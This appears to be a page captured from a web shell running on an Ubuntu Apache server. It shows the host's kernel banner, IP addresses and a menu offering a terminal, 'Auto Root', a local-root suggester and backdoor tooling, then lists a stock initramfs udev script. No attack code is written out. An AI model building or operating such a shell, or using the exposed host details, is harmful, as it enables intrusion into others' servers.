Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
initramfs-tools /
scripts /
init-bottom /
Delete
Unzip
Name
Size
Permission
Date
Action
cloud-initramfs-dyn-netconf
5.08
KB
-rwxr-xr-x
2020-08-18 01:00
copymods
2.02
KB
-rwxr-xr-x
2020-08-18 01:00
lvm2
370
B
-rwxr-xr-x
2021-05-20 02:33
overlayroot
25.96
KB
-rwxr-xr-x
2020-08-18 01:00
plymouth
190
B
-rwxr-xr-x
2022-03-18 19:45
udev
611
B
-rwxr-xr-x
2026-03-24 22:52
Save
Rename
#!/bin/sh -e PREREQS="" prereqs() { echo "$PREREQS"; } case "$1" in prereqs) prereqs exit 0 ;; esac # Stop udevd, we'll miss a few events while we run init, but we catch up udevadm control --exit # move the /dev tmpfs to the rootfs; fall back to util-linux mount that does # not understand -o move mount -n -o move /dev "${rootmnt:?}/dev" || mount -n --move /dev "${rootmnt}/dev" # create a temporary symlink to the final /dev for other initramfs scripts if command -v nuke >/dev/null; then nuke /dev else # shellcheck disable=SC2114 rm -rf /dev fi ln -s "${rootmnt}/dev" /dev